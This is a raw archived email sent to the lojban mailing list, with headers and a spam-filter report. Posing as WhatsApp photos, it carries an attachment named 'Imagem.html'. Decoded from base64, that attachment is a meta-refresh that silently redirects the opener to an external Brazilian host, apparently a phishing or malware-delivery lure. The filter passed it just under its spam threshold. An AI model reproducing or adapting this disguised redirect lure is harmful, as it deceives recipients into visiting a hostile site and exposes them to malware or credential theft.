Received: from vmi57760.contabo.host ([93.104.211.206]:43751) by stodi.digitalkingdom.org with esmtp (Exim 4.85) (envelope-from ) id 1aGlSP-000659-68 for lojban@lojban.org; Wed, 06 Jan 2016 02:36:50 -0800 Received: by vmi57760.contabo.host (Postfix, from userid 0) id 7521AF18FA6; Wed, 6 Jan 2016 10:24:11 +0100 (CET) Content-Transfer-Encoding: binary Content-Type: multipart/mixed; boundary="_----------=_14520722512008813494" MIME-Version: 1.0 X-Mailer: MIME::Lite 3.030 (F2.84; T2.04; A2.12; B3.13; Q3.13) Date: Wed, 6 Jan 2016 10:24:11 +0100 From: whatsapp6953092@vmi57760.contabo.host To: lojban@lojban.org Subject: Fotos enviadas do Whatsapp Message-Id: <20160106100327.7521AF18FA6@vmi57760.contabo.host> X-Spam-Score: 4.9 (++++) X-Spam_score: 4.9 X-Spam_score_int: 49 X-Spam_bar: ++++ X-Spam-Report: Spam detection software, running on the system "stodi.digitalkingdom.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: Segue em anexo as FOTOS enviadas através do WHATSAPP. [...] Content analysis details: (4.9 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 1.4 RCVD_IN_BRBL_LASTEXT RBL: No description available. [93.104.211.206 listed in bb.barracudacentral.org] 1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL, https://senderscore.org/blacklistlookup/ [93.104.211.206 listed in bl.score.senderscore.com] 2.7 RCVD_IN_PSBL RBL: Received via a relay in PSBL [93.104.211.206 listed in psbl.surriel.com] 1.3 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net [Blocked - see ] -0.0 RCVD_IN_MSPIKE_H4 RBL: Very Good reputation (+4) [93.104.211.206 listed in wl.mailspike.net] -0.0 T_RP_MATCHES_RCVD Envelope sender domain matches handover relay domain -1.9 BAYES_00 BODY: Bayes spam probability is 0 to 1% [score: 0.0000] -0.0 RCVD_IN_MSPIKE_WL Mailspike good senders 0.0 T_HTML_ATTACH HTML attachment to bypass scanning? This is a multi-part message in MIME format. --_----------=_14520722512008813494 Content-Disposition: inline Content-Transfer-Encoding: base64 Content-Type: text U2VndWUgZW0gYW5leG8gYXMgRk9UT1MgZW52aWFkYXMgYXRyYXbpcyBkbyBXSEFUU0FQUC4= --_----------=_14520722512008813494 Content-Disposition: attachment; filename="Imagem.html" Content-Transfer-Encoding: base64 Content-Type: application/x-zip; name="Imagem.html" DQo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyB1cmw9 aHR0cDovL3JlZGlyLnByb2R1Y29lc3ZzcmV2b2x1Y2FvLmNvbS5ici9JbWFn ZW0iPg== --_----------=_14520722512008813494--